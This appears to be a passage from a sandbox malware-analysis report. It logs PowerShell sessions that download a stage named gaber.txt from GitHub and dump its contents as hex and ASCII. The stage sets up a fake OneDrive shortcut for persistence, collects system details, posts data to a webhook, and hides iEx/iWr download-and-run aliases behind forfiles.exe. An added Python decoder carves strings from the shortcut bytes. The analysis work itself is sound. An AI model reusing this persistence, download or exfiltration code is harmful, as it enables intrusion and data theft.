                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii (line breaks restored):
                                                                sleep 5
                                                                rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
                                                                sleep 5
                                                                $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                if (-Not (Test-Path $googoogaagaa)) {
                                                                rm $env:tmp\onedrivefilesync.dll -force
                                                                New-ItemPropert
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii (line breaks restored):
                                                                cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors
                                                                # Retrieve GPU information
                                                                $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC  618  IN  Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii (line breaks restored):
                                                                ======================
                                                                "@
                                                                } | ConvertTo-Json
                                                                # Send the POST request to the webhook URL
                                                                try {
                                                                    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                                    Write-Output "Message sent successfully."
                                                                } catch {
                                                                    W


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                6  192.168.2.7  49768  185.199.109.133  443  7352  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                2024-10-15 14:00:14 UTC  222  OUT  GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC  901  IN  HTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120024-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.165471,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: bb54fbb1b40dd0ad763e58ba4439a0d7957f87c4
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii (line breaks restored):
                                                                sleep 5
                                                                rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
                                                                sleep 5
                                                                $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                if (-Not (Test-Path $googoogaagaa)) {
                                                                rm $env:tmp\onedrivefilesync.dll -force
                                                                New-ItemPropert
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC  1378  IN  Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii (line breaks restored):
                                                                cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors
                                                                # Retrieve GPU information
                                                                $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC  618  IN  Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii (line breaks restored):
                                                                ======================
                                                                "@
                                                                } | ConvertTo-Json
                                                                # Send the POST request to the webhook URL
                                                                try {
                                                                    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                                    Write-Output "Message sent successfully."
                                                                } catch {
                                                                    W
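The gaber.txt stage captured in sessions 4 to 7 removes and re-creates the persistence shortcut BeginSync.lnk under C:\ProgramData\Microsoft OneDrive\FileSync, and it does so by writing the .lnk out of a comma-separated decimal byte array rather than dropping a file, so the command line the shortcut will launch is only visible once that array is decoded. The Python below is an added example, not code from the report or from the sample: it decodes the three array fragments visible in the rows above (copied verbatim; each row is only the head of a 1378-byte slice, so a number may be cut at either end and is discarded rather than guessed) and carves UTF-16LE and single-byte strings from the result. What comes out is the forfiles.exe target name, the `...allit iEx; sal $env:os iWr; calliT(WINDOWS_NT ...` alias set-up, a digits-and-dashes run with the shape of the tail of a Windows SID (the leading part is outside the captured bytes), and the `1SPS` marker of a serialized property store. The minimum run length of 4 and the two-offset scan are this example's choices.

```python
import re
import string

# Constructed from the report: the first bytes of three of the 1378-byte rows of
# gaber.txt, which carry the .lnk file as a comma-separated decimal byte array.
# Each row shows only the head of its slice, so a fragment may start or end in
# the middle of a number.
LNK_FRAGMENTS = [
    ",0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,"
    "116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,"
    "101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,",
    ",0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,"
    "101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,"
    "105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,",
    "1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,"
    "51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,"
    "177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4",
]

# Printable characters minus the control whitespace, so a run ends at a tab or newline.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def decode_decimal_fragment(text: str) -> bytes:
    """Parse a comma-separated decimal byte list.

    A fragment that does not begin with a comma may start inside a number, and
    one that does not end with a comma may end inside one; both boundary
    numbers are dropped instead of guessed.
    """
    parts = text.split(",")
    if not text.startswith(","):
        parts = parts[1:]
    if not text.endswith(","):
        parts = parts[:-1]
    values = [int(p) for p in parts if p]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("value outside 0..255: not a byte array")
    return bytes(values)


def utf16le_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable UTF-16LE runs of at least min_len characters.

    Both byte offsets are scanned because a fragment may begin on the high
    byte of a code unit. A trailing unpaired byte is left undecoded.
    """
    runs = []
    for start in (0, 1):
        run = ""
        for i in range(start, len(data) - 1, 2):
            lo, hi = data[i], data[i + 1]
            if hi == 0 and chr(lo) in PRINTABLE:
                run += chr(lo)
                continue
            if len(run) >= min_len:
                runs.append(run)
            run = ""
        if len(run) >= min_len:
            runs.append(run)
    return runs


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Return printable single-byte runs (structure markers such as 1SPS show up here)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def carve_lnk_strings(fragments) -> dict:
    """Decode every fragment and collect the strings found in it, by encoding."""
    found = {"utf16": [], "ascii": []}
    for frag in fragments:
        data = decode_decimal_fragment(frag)
        found["utf16"] += utf16le_strings(data)
        found["ascii"] += ascii_strings(data)
    return found


if __name__ == "__main__":
    for kind, strs in carve_lnk_strings(LNK_FRAGMENTS).items():
        for s in strs:
            print(f"{kind}: {s!r}")
```

Run against the three fragments this prints `forfiles.exe`, the alias set-up ending in `calliT(WINDOWS_NT ` (the final `p` of the captured row is an unpaired low byte and is not decoded), `323021-915438069-3222363944-1001` and `1SPS0`. The same two routines work on the full 7508-byte body once it is reassembled from the six rows, which is the quickest way to get the shortcut's complete argument string without writing the .lnk to disk.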


                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                7  192.168.2.7  49771  185.199.109.133  443  7172  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp  Bytes transferred  Direction  Data
                                                                2024-10-15 14:00:14 UTC  222  OUT  GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC  901  IN  HTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210106-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.172466,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: f14414e3b629e18799bb629f77a7364d76a80be0
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
